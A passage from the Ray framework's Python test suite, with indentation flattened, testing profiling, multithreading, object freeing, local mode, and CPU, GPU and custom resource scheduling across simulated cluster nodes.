assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.test.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# relase resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=20, num_repeats=50):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(50):
num = 20
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(20)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
# Current Plasma Client Cache will maintain 64-item list.
# If the number changed, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert_equal(xref, np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert_equal(xref, ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert_equal(y, ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert_equal(aref, np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert_equal(aref, np.array([0, 0]))
assert_equal(bref, np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert_equal(ready, object_ids[:num_returns])
assert_equal(remaining, object_ids[num_returns:])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert_equal(test_actor.get_array.remote(), np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert_equal(test_array, np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert_equal(test_array, test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.test.test_utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.test.test_utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
